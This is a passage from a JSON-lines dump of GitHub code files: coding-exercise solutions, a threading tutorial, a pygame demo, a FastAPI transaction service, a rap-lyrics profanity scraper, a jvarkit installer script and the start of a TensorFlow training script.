dtype=dtypes[\"face\"], count=mesh_size)\n if ext != sys_byteorder:\n mesh_np = mesh_np.byteswap().newbyteorder()\n data[\"mesh\"] = pd.DataFrame(mesh_np)\n data[\"mesh\"].drop('n_points', axis=1, inplace=True)\n\n return data","repo_name":"RWTH-E3D/ifcnet-models","sub_path":"src/data/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"32"} +{"seq_id":"35642912348","text":"# baekjoon_10828 스택\n\n\ndef push(arr, num):\n num = int(num)\n arr.append(num)\n return\n\ndef my_pop(arr):\n if not arr:\n return -1\n num_pop = arr.pop()\n return num_pop\n\ndef size(arr):\n num_cnt = len(arr)\n return num_cnt\n\ndef my_empty(arr):\n if arr:\n return 0\n if not arr:\n return 1\ndef top(arr):\n if not arr:\n return -1\n else:\n return arr[-1]\n\nN = int(input())\n\ncommands = [list(input().split()) for n in range(N)]\narr = []\nfor command in commands:\n result = None\n if command[0] == 'push':\n push(arr, command[1])\n elif command[0] == 'top':\n result = top(arr)\n elif command[0] == 'size':\n result = size(arr)\n elif command[0] == 'empty':\n result = my_empty(arr)\n elif command[0] == 'pop':\n result = my_pop(arr)\n if result == None:\n pass\n else:\n print(f'{result}')\n","repo_name":"KJW159/coding-test-algorithm","sub_path":"python/baekjoon/baekjoon_10828.py","file_name":"baekjoon_10828.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9942950850","text":"#User function Template for python3\n\nclass Solution:\n def arraySortedOrNot(self, arr, n):\n # code here\n l = 0\n \n for r in range(1, n):\n if arr[r] 0:\n n = int(input())\n arr = list(map(int, input().strip().split()))\n \n ob = Solution()\n ans = ob.arraySortedOrNot(arr, n)\n if ans:\n print(1)\n else:\n print(0)\n tc -= 1\n\n# } Driver Code Ends","repo_name":"GizawAAiT/Competitive_programming","sub_path":"Check if array is sorted - GFG/check-if-array-is-sorted.py","file_name":"check-if-array-is-sorted.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"18352996529","text":"from minesweeper import MineSweeper, Result\n\ndef simple_test(rounds, difficulty, show = False):\n success = 0\n fail = 0\n stuck = 0\n success_duration = 0\n \n for i in range(rounds):\n game = MineSweeper(difficulty)\n result = game.play(show)\n if result.status == 'Success':\n success += 1\n success_duration += result.play_time\n elif result.status == 'Fail':\n fail += 1\n if result.stuck:\n stuck += 1\n\n print()\n print('==============')\n print('Tested:\\t\\t\\t', rounds, difficulty, 'games')\n print('Success:\\t\\t', success, 'games')\n print('Success duration:\\t', success_duration/success, 'sec per game')\n print('Fail (Stuck):\\t\\t {} ({}) games'.format(fail, stuck))\n\ndef mines_count_test(rounds, difficulty, mines, show = False):\n print('==============')\n print('Tested:', rounds, difficulty, 'games per mines_counts')\n print('Mines\\tSuccess\\tStuck\\tFail\\tFail-Stuck\\tSuccess duration')\n for m in range(1, mines+1):\n success = 0\n fail = 0\n stuck = 0\n success_duration = 0\n\n for i in range(rounds):\n game = MineSweeper(difficulty, m)\n result = game.play(show)\n if result.status == 'Success':\n success += 1\n success_duration += result.play_time\n elif result.status == 'Fail':\n fail += 1\n if result.stuck:\n stuck += 1\n\n print('{}\\t{}\\t{}\\t{}\\t{}\\t\\t{}'.format(m, success, stuck, fail, fail-stuck, success_duration/success))\n\n\nif __name__ == '__main__':\n simple_test(1000, 'easy')\n simple_test(1000, 'medium')\n simple_test(1000, 'hard')\n mines_count_test(100, 'medium', 40)\n","repo_name":"samuelyutt/Intro-Artificial-Intelligence-course","sub_path":"hw3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23335696893","text":"import threading\ndef HelloWorld():\n print('hello world')\n\n#we don't run the fonction we just call it \n#the thread are just used to speed up our script and make functions work in parallel\nt1= threading.Thread(target=HelloWorld)\n#start the thread \nt1.start()\ndef function1():\n for x in range(10000):\n print(\"OK1\")\ndef function2():\n for x in range(4000):\n print(\"OK2\")\n\nt1 = threading.Thread(target=function1)\nt2= threading.Thread(target=function2)\n\nt1.start()\nt2.start()\n\n#to not execute another code until i finish the thread \ndef helllo():\n for x in range(50):\n print(hello)\n\nt=threading.Thread(target=hello)\nt.start()\nt.join()\nprint('the thread is finished ')","repo_name":"charaf19/Intermediate-Python-tutorial","sub_path":"Multithreading.py","file_name":"Multithreading.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28648893520","text":"from PIL import Image\nimport numpy as np\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\n\n\ndef transf_tup_count(list_tuples):\n\tdict_skills = {}\n\tfor tuple in list_tuples:\n\t\tif len(tuple[0])>3:\n\t\t\tkey = str.capitalize(tuple[0])\n\t\telse:\n\t\t\tkey = str.upper(tuple[0])\n\t\tdict_skills[key] = tuple[1]\n\treturn dict_skills\n\ndict_skills = transf_tup_count(data)\n\n\ndef transform_format(val):\n\tif val == 0:\n\t\treturn 255\n\telse:\n\t\treturn val\n\ndb_mask = np.array(Image.open(\"./db_@.png\"))\n# for i in range(len(db_mask)):\n# \ttransformed_db_mask[i] = list(map(transform_format, db_mask[i]))\n#\n\nwordcloud = WordCloud(width=1600,height=1000 ,max_words=50,background_color=\"white\",mask=db_mask).generate_from_frequencies(frequencies=dict_skills)\nwordcloud.to_file(\"./db_c.png\")\n\n","repo_name":"lfpll/csv_linkedin_parser","sub_path":"treating data/word_cloud.py","file_name":"word_cloud.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15960738995","text":"import sys\r\nfrom collections import deque\r\nsys.stdin = open(\"input.txt\",\"rt\")\r\n\r\nq=deque()\r\nfor _ in range(int(sys.stdin.readline())):\r\n x = sys.stdin.readline().split()\r\n if x[0]=='push_front':\r\n q.appendleft(int(x[1]))\r\n if x[0] == 'push_back':\r\n q.append(int(x[1]))\r\n elif x[0]=='back':\r\n if len(q)>0:\r\n print(q[-1])\r\n else:\r\n print(-1)\r\n elif x[0]=='front':\r\n if len(q)>0:\r\n print(q[0])\r\n else:\r\n print(-1)\r\n elif x[0]=='size':\r\n print(len(q))\r\n elif x[0]=='empty':\r\n if len(q)==0:\r\n print(1)\r\n else:\r\n print(0)\r\n elif x[0]=='pop_front':\r\n if len(q)>0:\r\n print(q.popleft())\r\n else:\r\n print(-1)\r\n elif x[0]=='pop_back':\r\n if len(q)>0:\r\n print(q.pop())\r\n else:\r\n print(-1)","repo_name":"Chord-West/Algorithm","sub_path":"PythonAlgorithm/BaekJoon/Silver/queues.py","file_name":"queues.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24043812398","text":"import logging\nfrom aiogram import types\nfrom aiogram.types.inline_keyboard import InlineKeyboardMarkup, InlineKeyboardButton\nfrom random import randint\n\nfrom config import settings, dp\n\nlogger = logging.getLogger(__name__)\n\nurl = 't.me'\n\n\nasync def get_markup(callback: types.CallbackQuery) -> InlineKeyboardMarkup:\n admin_number = randint(0, len(settings.ADMINS_ID) - 1)\n admin_id = settings.ADMINS_ID[admin_number]\n admin_username = settings.ADMINS_USERNAME[admin_number]\n\n await dp.bot.send_message(\n chat_id=admin_id,\n text=f'Новый пользователь: @{callback.from_user.username}:\\n'\n f'id: {callback.from_user.id}\\n'\n f'Имя: {callback.from_user.first_name}\\n'\n f'Фамилия: {callback.from_user.last_name}\\n\\n'\n f'Запрос: {callback.data}'\n )\n\n buttons = [\n InlineKeyboardButton(\n text='Сотрудник >',\n callback_data=f'{callback.data}/{admin_id}_final',\n url=f'{url}/{admin_username}'\n )\n ]\n\n markup = InlineKeyboardMarkup()\n for button in buttons:\n markup.add(button)\n\n return markup\n","repo_name":"gkar1na/crypto_bot","sub_path":"keyboards/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39870510879","text":"\"\"\"\n@DATE: 2023/4/24\n@Author : ld\n\"\"\"\nimport pygame\n\nWIDTH = 400\nHEIGHT = 600\n\npygame.init()\n\nwindow = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"点击事件\")\nwindow.fill((255, 255, 255))\n\nfont = pygame.font.Font(\"../files/font/simkai.ttf\", 30)\n\n# 1. 确定按钮\nbx1, by1, bw1, bh1 = 30, 100, 100, 50\npygame.draw.rect(window, (0, 255, 0), (bx1, by1, bw1, bh1))\ntext1 = font.render(\"确定\", True, (255, 255, 255))\nw, h = text1.get_size()\ntx1 = bx1 + (bw1-w)/2\nty1 = by1 + (bh1-h)/2\nwindow.blit(text1, (tx1, ty1))\n\n# 2. 取消按钮\nbx2, by2, bw2, bh2 = 30, 200, 100, 50\npygame.draw.rect(window, (255, 0, 0), (bx2, by2, bw2, bh2))\ntext2 = font.render(\"取消\", True, (255, 255, 255))\nw, h = text1.get_size()\ntx2 = bx2 + (bw2-w)/2\nty2 = by2 + (bh2-h)/2\nwindow.blit(text2, (tx2, ty2))\n\n\npygame.display.flip()\nflg = True\nwhile flg:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n flg = False\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n mx, my = event.pos\n if bx1 <= mx <= bx1+bw1 and by1<= my <= by1+bh1:\n pygame.draw.rect(window, (200, 200, 200), (bx1, by1, bw1, bh1))\n window.blit(text1, (tx1, ty1))\n\n print(\"确定\")\n elif bx2 <= mx <= bx2+bw2 and by2<= my <= by2+bh2:\n pygame.draw.rect(window, (200, 200, 200), (bx2, by2, bw2, bh2))\n window.blit(text2, (tx2, ty2))\n print(\"取消\")\n\n if event.type == pygame.MOUSEBUTTONUP:\n pygame.draw.rect(window, (0, 255, 0), (bx1, by1, bw1, bh1))\n window.blit(text1, (tx1, ty1))\n pygame.draw.rect(window, (255, 0, 0), (bx2, by2, bw2, bh2))\n window.blit(text2, (tx2, ty2))\n\n pygame.display.update()\n\n\n\n\n","repo_name":"davidli006/pygame_learn","sub_path":"day-02/click.py","file_name":"click.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4682236211","text":"\"\"\"A module that contains all the calls to the database related to the Transactions table\"\"\"\nfrom models.transactions import Transaction\nfrom sqlalchemy import desc\nfrom sqlalchemy.orm import Session\nfrom fastapi import HTTPException, status\nfrom typing import List\nfrom models import transactions, tiles, transaction_details\nfrom schemas import transaction_schema, tile_schema\nfrom services import country_service, users_service\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom datetime import datetime\nfrom helpers import quadkey_parser\n\ndef insert_transaction(db: Session, transaction: transaction_schema.InsertTransaction, tiles_schema: List[tile_schema.TileInsert], userid: int):\n\n db_tiles = []\n db_transaction_details = []\n totalprice = 0\n\n if tiles_schema is None or len(tiles_schema) < 1:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"Something went wrong with tiles\")\n\n db_transaction = transactions.Transaction(\n date_created=transaction.date_created,\n date_processed=transaction.date_processed,\n status=transaction.status,\n total_price=transaction.total_price,\n total_tiles=transaction.total_tiles,\n user_id=userid\n )\n if db_transaction is None:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"Something went wrong with transaction\")\n\n for tile in tiles_schema:\n if tile.country_id is None or tile.country_id == '' or tile.country_id == 'SEA':\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail='You can only buy tiles on land!')\n\n db_tile = tiles.Tile(\n id=quadkey_parser.quadkey_to_quadint(tile.id),\n base_price=tile.base_price,\n location=tile.location,\n available=tile.available,\n tile_class=tile.tile_class,\n for_sale=tile.for_sale,\n user_flag=tile.user_flag,\n date_changed=tile.date_changed,\n country_id=tile.country_id,\n user_id=tile.user_id\n )\n db_tiles.append(db_tile)\n\n country = country_service.get_by_id(db, tile.country_id)\n unitprice = tile.base_price * country.price_multiplier\n db_transaction_detail = transaction_details.TransactionDetail(\n unit_price=unitprice,\n transaction_id=db_transaction.id,\n tile_id=quadkey_parser.quadkey_to_quadint(tile.id)\n )\n db_transaction_details.append(db_transaction_detail)\n\n if db_transaction_details is None:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"Something went wrong with transaction details\")\n\n totalprice += unitprice\n\n totaltiles = len(db_tiles)\n\n new_trans_data = {\n \"date_processed\": datetime.utcnow(),\n \"status\": 1,\n \"total_price\": totalprice,\n \"total_tiles\": totaltiles\n }\n\n db_user = users_service.get_by_id(db, db_transaction.user_id)\n if db_user.credit < totalprice:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"There is not enough credits for transaction\")\n\n try:\n db.add(db_transaction)\n db.commit()\n db.refresh(db_transaction)\n for db_transaction_detail in db_transaction_details:\n db_transaction_detail.transaction_id = db_transaction.id\n db.bulk_save_objects(db_tiles)\n db.bulk_save_objects(db_transaction_details)\n update_transaction(db, new_trans_data, db_transaction.id)\n db_user.credit -= totalprice\n db.add(db_user)\n db.commit()\n db.refresh(db_user)\n return db_user\n\n except SQLAlchemyError as e:\n db.rollback()\n delete_transaction(db, db_transaction.id)\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"Transaction failed : \" + str(type(e)))\n\n\ndef get_by_id(db: Session, trans_id: int):\n\n return db.query(transactions.Transaction).filter(transactions.Transaction.id == trans_id).first()\n\n\ndef update_transaction(db: Session, transaction: transaction_schema.EditTransaction, trans_id: int):\n\n db_transaction = get_by_id(db, trans_id)\n\n if db_transaction is None:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST, detail=\"Transaction not found\")\n if(type(transaction) != dict):\n update_data = transaction.dict(exclude_unset=True)\n else:\n update_data = transaction\n for key, value in update_data.items():\n setattr(db_transaction, key, value)\n\n try:\n db.add(db_transaction)\n db.commit()\n db.refresh(db_transaction)\n return db_transaction\n except SQLAlchemyError as e:\n db.rollback()\n return None\n\n\ndef get_transactions_by_user_id(db: Session, user_id: int, skip: int, limit: int):\n\n return db.query(transactions.Transaction).filter(transactions.Transaction.user_id == user_id).order_by(desc(transactions.Transaction.id)).offset(skip).limit(limit).all()\n\n\ndef get_all_transactions(db: Session, skip: int = 0, limit: int = 100):\n\n return db.query(transactions.Transaction).order_by(desc(Transaction.date_created)).offset(skip).limit(limit).all()\n\n\ndef delete_transaction(db: Session, trans_id: int):\n\n try:\n db.query(transactions.Transaction).filter(transactions.Transaction.id == trans_id).delete()\n db.commit()\n return True\n except SQLAlchemyError as e:\n db.rollback()\n return None\n \n","repo_name":"tarikstupac/planet-test","sub_path":"services/transactions_service.py","file_name":"transactions_service.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72365593372","text":"\r\n\r\n\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport pandas as pd\r\n\r\nSIGNS = ['.', ',', ':', ';', '!', '?', '*', '#', '@', '&', '-', '(', ')',\r\n '[', ']', '{', '}']\r\nCOLUMNS = [\"Song\", \"Artist\", \"Gender\", \"Album\", \"Date\", \"URL\",\r\n \"Profanities\"]\r\nOHHLA_SITE = ' http://ohhla.com/'\r\n\r\n\r\ndef read_wordlist_file(filename):\r\n \"\"\"\r\n Reads the words' list file and returns its insides as a list\r\n :param filename: The name of the words file\r\n :return: A list contains the words from the file\r\n \"\"\"\r\n words = open(filename)\r\n word_file = []\r\n for word in words.readlines():\r\n word_file.append(word[:-1])\r\n words.close()\r\n return word_file\r\n\r\n\r\ndef get_links_from_ugly(url, soup, lst):\r\n \"\"\"\r\n Read links from relatively 'naked' menu pages, for albums and the songs\r\n in the albums\r\n :param lst:\r\n :param url: The address of the menu page\r\n :param soup: The content of that menu page\r\n :return: A list of links to the texts of the songs\r\n \"\"\"\r\n text_links = []\r\n links = soup.find_all('tr')[3:-1]\r\n for link in links:\r\n new_link = url + link.find('a').get('href')\r\n if new_link[-4:] != '.txt':\r\n html = requests.get(new_link).text\r\n soup = BeautifulSoup(html, 'html.parser')\r\n text_links += get_links_from_ugly(new_link, soup, lst)\r\n else:\r\n if new_link not in lst:\r\n text_links.append(new_link)\r\n return text_links\r\n\r\n\r\ndef find_all_songs(url):\r\n \"\"\"\r\n Gets the links to the songs of all the artists with a page on the site\r\n :param url: The address of the list of artists\r\n :return: A list of all the links to all the songs\r\n \"\"\"\r\n used_menus = [url]\r\n artists = []\r\n lyric_links = []\r\n while True:\r\n html = requests.get(url).text\r\n soup = BeautifulSoup(html, 'html.parser')\r\n links = soup.find('pre').find_all('a')[1:]\r\n for link in links:\r\n # in case the line is empty\r\n if link.get('href') is None:\r\n continue\r\n artists.append(OHHLA_SITE + str(link.get('href')))\r\n # The next lines are for moving between the pages to get all the\r\n # artists\r\n # menus = soup.find('h3').find_all('a')\r\n # for menu in menus:\r\n # link = menu.get('href')\r\n # if '#' in link or (OHHLA_SITE + link) in used_menus:\r\n # continue\r\n # else:\r\n # url = OHHLA_SITE + link\r\n # used_menus.append(url)\r\n # break\r\n break\r\n for artist in artists:\r\n html = requests.get(artist).text\r\n soup = BeautifulSoup(html, 'html.parser')\r\n # Ugly menu pages do not have the item 'br' in them. I am using that\r\n # fact to find those ugly menu pages\r\n if soup.find('br') is None:\r\n lyric_links += get_links_from_ugly(artist, soup, lyric_links)\r\n # 'Prettier' pages have tables for the artist's albums, with links to\r\n # the songs in those tables\r\n else:\r\n try:\r\n albums = soup.find('table').find_all('table')[1:]\r\n except AttributeError:\r\n # Usually a bad link can come from not having an .html at the\r\n # end\r\n try:\r\n artist = soup.find('meta').get('content').split('URL=')[1]\r\n html = requests.get(artist).text\r\n soup = BeautifulSoup(html, 'html.parser')\r\n albums = soup.find('table').find_all('table')[1:]\r\n # Otherwise, there are some broken links, and they cannot be\r\n # helped\r\n except IndexError:\r\n continue\r\n for album in albums:\r\n songs = album.find_all('tr')[2:]\r\n for song in songs:\r\n try:\r\n if OHHLA_SITE + song.find('a').get('href') not in \\\r\n lyric_links:\r\n lyric_links.append(OHHLA_SITE + song.find(\r\n 'a').get('href'))\r\n except AttributeError:\r\n continue\r\n return lyric_links\r\n\r\n\r\ndef find_profanities(lyrics, profanities):\r\n \"\"\"\r\n Finds Profanities within a song\r\n :param lyrics: The song's text\r\n :param profanities: A list of profane words\r\n :return: A dictionary of profanities and the No. of times they were shown\r\n \"\"\"\r\n words = []\r\n used_swears = {}\r\n # Taking the song's text and putting it in a list\r\n for line in lyrics:\r\n line = line.split(' ')\r\n words += line\r\n for word in words:\r\n for sign in SIGNS:\r\n if sign in word:\r\n word.replace(sign, '')\r\n if word in profanities:\r\n if word not in used_swears:\r\n used_swears[word] = 1\r\n else:\r\n used_swears[word] += 1\r\n return used_swears\r\n\r\n\r\ndef data_profanities(url):\r\n \"\"\"\r\n A function that creates a new json file with a dataframe of songs from an\r\n OHHLA page\r\n :param url: The url of an OHHLA page with a list of artists,\r\n in alphabetical order\r\n :return: Nothing. Creates a json file\r\n \"\"\"\r\n songs_dt = pd.DataFrame(columns=COLUMNS)\r\n songs = find_all_songs(url)\r\n all_profanities = read_wordlist_file('bad-words.txt')\r\n for song in songs:\r\n html = requests.get(song).text\r\n soup = BeautifulSoup(html, 'html.parser')\r\n # Some songs have the text and some other stuff\r\n try:\r\n details = soup.find('pre').text.split('\\n')\r\n # While some have only text\r\n except AttributeError:\r\n details = soup.text.split('\\n')\r\n if details[0] == \"\":\r\n details = details[1:]\r\n artist = \\\r\n details[0].replace('Artist: ', '').split(' f/ ')[0].split(' x ')[\r\n 0].split(' + ')[0].upper()\r\n # If the song is empty, the loop will continue\r\n try:\r\n album = details[1].replace('Album: ', '')\r\n except IndexError:\r\n continue\r\n song_name = details[2].replace('Song: ', '')\r\n song_lyrics = details[5:]\r\n profanities = find_profanities(song_lyrics, all_profanities)\r\n gender = '?'\r\n ethnicity = \"?\"\r\n date = None\r\n song_details = [song_name, artist, gender, ethnicity ,album, date,\r\n song, profanities]\r\n songs_dt = songs_dt.append(pd.DataFrame(columns=COLUMNS,\r\n data=[song_details]))\r\n songs_dt.reset_index(drop=True, inplace=True)\r\n # TODO: we changed the file to part 1 just to delete old files!\r\n songs_dt.to_json('songs_dt_part_1.json', orient='table', indent=4)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n data_profanities('http://ohhla.com/all_five.html')\r\n","repo_name":"IggieB/Data-mining","sub_path":"rap_mine.py","file_name":"rap_mine.py","file_ext":"py","file_size_in_byte":6938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4424313635","text":"#!/usr/bin/env python3\nimport subprocess, sys, os, re\nfrom collections import OrderedDict\n\njvarkit=\"/usr/share/jvarkit\"\ninstall_location=\"/usr/local/bin\"\n\ndef print_tools(tools):\n \"\"\" Pretty print a list of running interactive jobs from create_queue \"\"\"\n\n name_len = 10\n\n for k, v in tools.items():\n name_len = max([name_len, len(k)])\n name_len = name_len + 2\n\n tools = OrderedDict(sorted(tools.items()))\n\n # Print the thing\n for k, v in tools.items():\n print(k.ljust(name_len) + v)\n\ndef install_tool(tool):\n \"\"\" Install the tool \"\"\"\n os.chdir(jvarkit)\n subprocess.check_call('JAVA_HOME=/usr/lib/jvm/java-7-openjdk ant ' + tool.lower(), shell=True)\n subprocess.check_call(\"perl -pi -e 's#java#/usr/lib/jvm/java-7-openjdk/jre/bin/java#' dist/\" + tool.lower(), shell=True)\n subprocess.check_call(\"perl -pi -e 's#PREFIX=\\$\\(dirname \\$0\\)#PREFIX=/usr/share/java/jvarkit#' dist/\" + tool.lower(), shell=True)\n subprocess.check_call('mv dist/' + tool.lower() + ' ' + install_location, shell=True)\n\ndef uninstall_tool(tool):\n \"\"\" Uninstall the tool \"\"\"\n os.chdir(jvarkit)\n try:\n subprocess.check_call('rm dist/' + tool.lower() + '.jar', shell=True)\n subprocess.check_call('rm ' + install_location + '/' + tool.lower(), shell=True)\n except subprocess.CalledProcessError:\n print(\"Tool\", tool, \"appears to not be installed\")\n return\n print(\"Uninstalled \" + tool)\n\ndef get_table():\n \"\"\" Download tool table from web \"\"\"\n file = open(jvarkit + '/README.md', 'r')\n table = {}\n for i in file:\n if i.startswith('([^<]+)', i)[0]\n t = re.findall(r'href=\"[^\"]+\">([^<]+)', i)[0]\n y = re.findall(r'>([^<]+)$', i)[0]\n table[t] = y\n return(table)\n\ndef _get_args():\n \"\"\"Command Line Argument Parsing\"\"\"\n import argparse\n\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n # Tool\n parser.add_argument('tool_name', nargs='?', help=\"Tool to install or uninstall\")\n\n # Flags\n parser.add_argument('-l', '--list', action='store_true', help=\"List all tools\")\n parser.add_argument('-i', '--install', action='store_true', help=\"Install specified tool\")\n parser.add_argument('-u', '--uninstall', action='store_true', help=\"Uninstall specified tool\")\n\n return(parser)\n\n# Main function for direct running\ndef main():\n \"\"\"Run directly\"\"\"\n # Get commandline arguments\n parser = _get_args()\n args = parser.parse_args()\n\n tools = get_table()\n\n if args.list:\n print_tools(tools)\n sys.exit(0)\n\n if not args.tool_name:\n parser.print_help()\n sys.exit(1)\n\n if args.install:\n install_tool(args.tool_name)\n\n if args.uninstall:\n uninstall_tool(args.tool_name)\n\n# The end\nif __name__ == '__main__':\n main()\n","repo_name":"juju2013/AUR","sub_path":"jvarkit-git/jvarkit-install.py","file_name":"jvarkit-install.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"10788014355","text":"import random \nfrom random import randrange\n\nnum = random.randrange(1 , 5)\nn = 0\n\nwhile n != num:\n n = int(input(\"Ingrese un numero: \"))\n if n == num:\n print(\"Muy bien\")\n break\n elif n > num:\n print(\"El numero es menor.\")\n elif n < num:\n print(\"El numero es mayor.\") ","repo_name":"LSchaab/Trabajo-Practico-1-de-Objetos","sub_path":"Ejercicio10.py","file_name":"Ejercicio10.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29811344655","text":"import datetime\nimport os\nimport random\nimport sys\nimport tensorflow as tf\nimport numpy as np\n\nfrom src.data_utils.loader import list_filenames, load_data, ORIGINAL_SHAPE\n\nfrom src.models.ed import Model\nfrom src.utils import reshape_patch, gpu_split\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\nflags.DEFINE_integer('input_length', 12,\n 'encoder hidden states.')\nflags.DEFINE_integer('total_length', 15,\n 'total input and output length.')\nflags.DEFINE_integer('img_width', ORIGINAL_SHAPE[1],\n 'input image width.')\nflags.DEFINE_integer('img_height', ORIGINAL_SHAPE[0],\n 'input image height.')\nflags.DEFINE_integer('img_channel', 3,\n 'number of image channel.')\n\n\nclass Generator:\n def __call__(self, file, K, T):\n data = load_data(file, K=K,\n T=T)\n yield data\n\n\nclass Generator2:\n def __call__(self, data):\n for seq in data:\n seq = np.expand_dims(seq, axis=0)\n ims_reverse = seq[:, :, :, ::-1]\n ims_reverse = reshape_patch(ims_reverse, 1)\n ims_reverse = ims_reverse.squeeze()\n ims_r = reshape_patch(seq, 1)\n ims_r = ims_r.squeeze()\n\n yield ims_r, ims_reverse\n\n\ndef get_data(filenames, path):\n if \"validation\" in path:\n filenames = random.sample(filenames, 2)\n num_parallel_calls = 2\n else:\n num_parallel_calls = 3\n cycle_length = len(filenames)\n block_length = 1\n ds = tf.data.Dataset.from_tensor_slices(filenames)\n ds = ds.interleave(lambda filename: tf.data.Dataset.from_generator(\n Generator(),\n tf.float32,\n (tf.TensorShape([272, FLAGS.total_length, ORIGINAL_SHAPE[0], ORIGINAL_SHAPE[1], 3])),\n args=(path + filename, FLAGS.input_length, FLAGS.total_length - FLAGS.input_length)),\n cycle_length, block_length, num_parallel_calls=1)\n\n ds = ds.interleave(lambda x: tf.data.Dataset.from_generator(\n Generator2(),\n (tf.float32, tf.float32, tf.float32),\n output_shapes=(tf.TensorShape([FLAGS.total_length, ORIGINAL_SHAPE[0], ORIGINAL_SHAPE[1], 3]),\n tf.TensorShape([FLAGS.total_length - FLAGS.input_length - 1, ORIGINAL_SHAPE[0],\n ORIGINAL_SHAPE[1], 3]),\n tf.TensorShape([FLAGS.total_length, ORIGINAL_SHAPE[0], ORIGINAL_SHAPE[1], 3])),\n args=(x,)),\n cycle_length, block_length, num_parallel_calls=num_parallel_calls)\n return ds\n\n\ndef train_wrapper():\n # load data\n\n file_names = list_filenames(FLAGS.train_data_paths)\n # shuffle it\n random.shuffle(file_names)\n\n valid_file_names = list_filenames(FLAGS.valid_data_paths)\n train_dataset = get_data(file_names, path=FLAGS.train_data_paths)\n train_dataset = train_dataset.batch(FLAGS.batch_size * FLAGS.n_gpu, drop_remainder=True)\n train_dataset = train_dataset.prefetch(tf.data.experimental.AUTOTUNE)\n train_dataset.repeat(FLAGS.max_iterations)\n\n valid_dataset = get_data(valid_file_names, path=FLAGS.valid_data_paths)\n # valid_dataset = valid_dataset.batch(FLAGS.batch_size, drop_remainder=True)\n\n dataset_iter = tf.data.Iterator.from_structure(train_dataset.output_types, train_dataset.output_shapes)\n\n train_init_op = dataset_iter.make_initializer(train_dataset)\n valid_init_op = dataset_iter.make_initializer(valid_dataset)\n\n model = Model(FLAGS, train_init_op, dataset_iter)\n\n if FLAGS.save_dir and len(os.listdir(FLAGS.save_dir)):\n print(\"load model from checkpoints..\")\n model.load(FLAGS.save_dir)\n counter = 0\n next_element = dataset_iter.get_next()\n try:\n for itr in range(FLAGS.max_iterations):\n ims_r, ims_reverse = model.sess.run(next_element)\n train(model, ims_r, FLAGS, counter, ims_reverse)\n if counter % FLAGS.snapshot_interval == 0:\n model.save(itr)\n # random day for validation\n # model.sess.run(valid_init_op)\n # test(model, dataset_iter, configs=FLAGS, save_name=\"result\")\n if counter % FLAGS.test_interval == 0:\n pass\n counter += 1\n except tf.errors.OutOfRangeError:\n pass\n\n\ndef train(model, ims, real_input_flag, configs, itr, ims_reverse=None):\n ims = ims[:, :configs.total_length]\n\n ims_list = gpu_split(ims, configs.n_gpu, configs.batch_size)\n\n cost = model.train(ims_list, configs.lr, real_input_flag)\n\n flag = 1\n ims_rev = gpu_split(ims_reverse[:, ::-1], configs.n_gpu, configs.batch_size)\n cost += model.train(ims_rev, configs.lr, real_input_flag)\n flag += 1\n ims_rev = gpu_split(ims_reverse[:, ::-1], configs.n_gpu, configs.batch_size)\n cost += model.train(ims_rev, configs.lr, real_input_flag)\n flag += 1\n\n cost = cost / flag\n\n if itr % configs.display_interval == 0:\n print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'itr: ' + str(itr))\n print(f'training loss: {cost}')\n\n\ndef main():\n train_wrapper()\n\n\nif __name__ == '__main__':\n tf.compat.v1.app.run(argv=sys.argv)\n","repo_name":"tumeteor/neurips2019challenge","sub_path":"src/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5184,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"26384830808","text":"import json\nfrom django.conf import settings\nfrom django.core.exceptions 